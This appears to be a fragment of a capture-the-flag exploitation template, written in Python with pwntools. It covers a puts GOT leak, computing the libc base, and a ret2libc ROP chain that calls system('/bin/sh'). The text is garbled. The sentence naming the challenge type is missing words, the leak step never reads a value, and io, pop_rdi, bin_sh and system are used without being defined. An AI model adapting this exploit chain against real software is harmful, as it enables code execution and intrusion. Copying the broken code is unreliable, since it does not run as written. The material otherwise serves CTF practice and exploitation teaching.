If the challenge is a , use:

from pwn import *  # pwntools: ELF, flat, log

elf = ELF('<path_to_binary>')  # the challenge binary

# ---- Step 1: Leak an address (example: puts@GLIBC) -----------------
offset = <offset_to_ret>
puts_plt = elf.plt['puts']        # PLT stub for puts in the binary
puts_got = elf.got['puts']        # GOT slot holding the resolved puts address
main_addr = elf.symbols['main']

# ---- Step 2: Compute libc base ------------------------------------
libc = ELF('<path_to_libc.so.6>')  # provided or from system
libc.address = leaked_puts - libc.symbols['puts']  # leaked_puts: value read back in Step 1
log.info(f'Libc base: {hex(libc.address)}')

If the challenge is a , use:

# pad to the saved return address, then the gadget chain
rop_payload = flat(
    b'A' * offset,
    pop_rdi,
    bin_sh,
    system,
)
io.sendlineafter(b'> ', rop_payload)